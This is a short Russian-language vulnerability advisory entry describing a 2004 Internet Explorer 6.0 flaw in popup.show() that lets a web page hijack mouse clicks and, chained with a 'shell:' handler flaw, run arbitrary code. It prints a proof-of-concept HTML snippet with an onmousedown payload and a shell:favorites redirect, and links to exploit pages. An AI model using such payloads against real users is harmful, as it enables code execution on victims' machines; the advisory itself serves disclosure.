Дата публикации: | 13.07.2004 |
Всего просмотров: | 1786 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Microsoft Internet Explorer 6.0
Описание: Уязвимость обнаружена в Microsoft Internet Explorer в popup.show(). Удаленный пользователь может выполнить произвольные действия мышки на целевой системе Удаленный пользователь может создать HMTL, который использует функцию popup.show() с 'on mousedown' событием, чтобы выполнить различные действия мышки на целевой системе пользователя. Пример: http://freehost07.websamba.com/greyhats/hijackclick3.htm Эта уязвимая функция может использоваться вместе с уязвимостью в "shell://" обработчике, чтобы выполнить произвольный код на целевой системе пользователя. Пример: <img src="greyhat.html" id=anch onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height= 2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert ()',3000);" style="width=168px;height=152px;background-image:url ('youlickit.gif');cursor:hand" title="click me!"></a> location="shell:favorites\\greyhat[1].htm" Пример/Эксплоит: http://www.malware.com/paul.html URL производителя: http://www.microsoft.com/technet/security/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | HijackClick 3 |